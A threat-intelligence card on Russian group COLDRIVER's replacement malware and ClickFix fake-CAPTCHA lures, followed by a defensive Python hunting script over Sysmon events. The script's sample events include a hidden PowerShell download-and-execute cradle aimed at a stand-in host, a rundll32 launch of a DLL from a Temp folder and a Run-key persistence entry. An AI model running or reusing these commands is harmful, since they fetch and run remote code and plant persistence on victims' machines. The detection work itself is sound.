Google finds Russian state hackers replacing burned malware with new tools
Category: Threat Alerts / Threat Intelligence
Google’s Threat Intelligence Group (GTIG) reports that COLDRIVER (aka Star Blizzard/Callisto/UNC4057) retooled within days of the May 2025 public disclosure of its LostKeys malware. The replacement chain consists of NOROBOT, an initial DLL payload launched via rundll32 from a ClickFix-style fake CAPTCHA lure; YESROBOT, a Python backdoor that was used only briefly; and MAYBEROBOT, the PowerShell backdoor that succeeded it. Operational tempo increased over the same period, indicating iterative TTP evolution and an emphasis on stealthy persistence.
CORTEX Protocol Intelligence Assessment
Business Impact: Persistent espionage risk for NGOs, media, academia, and policy institutions, the group’s long-standing target set.
Technical Context: Fake CAPTCHA (ClickFix-style) lures that get the victim to run a pasted command, staged payloads, and a backdoor rewritten for stability signal adaptive tradecraft that will outpace indicator-only blocking.
Strategic Intelligence Guidance
- Block known lure infra; enforce browser isolation for high‑risk roles.
- Hunt for rundll32 executing DLLs from user‑writable paths, DLL sideloading, and suspicious persistence artifacts (user Run keys, scheduled tasks pointing into AppData/Temp).
- Enforce phishing‑resistant MFA and conditional access for email access; credential phishing remains this actor’s primary entry path.
- Monitor for data staging on user endpoints post‑phish.
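The hunting guidance above translates into a small correlation rule set. The following is an added example written for this card; it is not tooling from Google, The Record, or the CORTEX Protocol, and it encodes no real COLDRIVER indicators. It assumes Sysmon‑style events (EventID 1 process creation, EventID 13 registry value set) with the field names shown, and the sample events are constructed. The rules cover the generic ClickFix pattern (a LOLBin spawned from explorer.exe after the user pastes a lure command into the Run dialog, the RunMRU history that leaves behind, rundll32 loading a DLL from a user‑writable path) and user‑level Run‑key persistence; the escalation threshold is an assumption to tune per environment.

```python
"""Hunt for ClickFix-style fake-CAPTCHA execution chains and user-level persistence.

Added example; not Google's, The Record's or the CORTEX Protocol's tooling, and
no real COLDRIVER indicators are encoded. Field names follow Sysmon conventions
and every sample value below is constructed.
"""
from __future__ import annotations
import re

# LOLBins a pasted Run-dialog command typically hands the payload to (assumption: adjust per estate).
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                   "rundll32.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
# Paths a standard user can write to; a DLL loaded from here by rundll32 is worth a look.
USER_WRITABLE = re.compile(
    r"(\\Users\\[^\\]+\\(AppData|Downloads|Public)|\\Temp\\|%temp%|%appdata%)", re.I)
# Download cradles, hidden windows, encoded commands, rundll32 "dll,Export" syntax.
SUSPICIOUS_ARGS = re.compile(
    r"(https?://|-enc\b|-e\b|-w(indowstyle)?\s+hidden|iex\b|invoke-expression|downloadstring|\.dll\s*,)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
RUNMRU = re.compile(r"\\Explorer\\RunMRU\\", re.I)


def classify(ev: dict) -> list[str]:
    """Return the names of the hunt rules a single event matches (empty list if benign)."""
    hits: list[str] = []
    if ev.get("EventID") == 1:
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "")
        # Run dialog launches are children of explorer.exe; a LOLBin with a cradle is the ClickFix shape.
        if parent == "explorer.exe" and image in LOLBIN_CHILDREN and SUSPICIOUS_ARGS.search(cmd):
            hits.append("clickfix_run_dialog_chain")
        if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
            hits.append("rundll32_user_writable_dll")
    elif ev.get("EventID") == 13:
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        # RunMRU records what the user typed into Win+R; a cradle there is the lure's footprint.
        if RUNMRU.search(target) and SUSPICIOUS_ARGS.search(details):
            hits.append("run_dialog_history_lolbin")
        if RUN_KEY.search(target) and (USER_WRITABLE.search(details) or SUSPICIOUS_ARGS.search(details)):
            hits.append("run_key_persistence_user_path")
    return hits


def hunt(events: list[dict]) -> dict[str, list[str]]:
    """Aggregate distinct rule hits per host so the chain is judged as a whole."""
    by_host: dict[str, set[str]] = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            by_host.setdefault(ev["Computer"], set()).update(hits)
    return {host: sorted(rules) for host, rules in by_host.items()}


def escalate(findings: dict[str, list[str]], min_rules: int = 2) -> list[str]:
    """Hosts where at least min_rules distinct stages fired (threshold is an assumption)."""
    return sorted(host for host, rules in findings.items() if len(rules) >= min_rules)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SID = r"HKU\S-1-5-21-1111-2222-3333-1001"
# Constructed sample telemetry: four events from a victim workstation, two benign events elsewhere.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-0421", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -w hidden -c iex (New-Object Net.WebClient).DownloadString('https://captcha-verify.example/verify')"},
    {"EventID": 1, "Computer": "WS-0421", "ParentImage": PS, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\verify.dll,Start"},
    {"EventID": 13, "Computer": "WS-0421",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": r"powershell -w hidden -c iex (New-Object Net.WebClient).DownloadString('https://captcha-verify.example/verify')\1"},
    {"EventID": 13, "Computer": "WS-0421",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"powershell -w hidden -File C:\Users\jdoe\AppData\Roaming\updater.ps1"},
    {"EventID": 1, "Computer": "WS-0777", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c ipconfig /all"},
    {"EventID": 13, "Computer": "WS-0777",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    findings = hunt(SAMPLE_EVENTS)
    for host, rules in findings.items():
        print(host, rules)
    print("escalate:", escalate(findings))
```

Each rule on its own is noisy (RunMRU is written whenever anyone uses Win+R, and rundll32 has legitimate uses), which is why the example scores per host and escalates only when several stages of the chain appear together; the post‑phish data‑staging bullet would be a further rule over file‑creation events in the same per‑host model.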
Intelligence Source: Google finds Russian state hackers replacing burned malware with new tools | The Record from Recorded Future News | Oct 22, 2025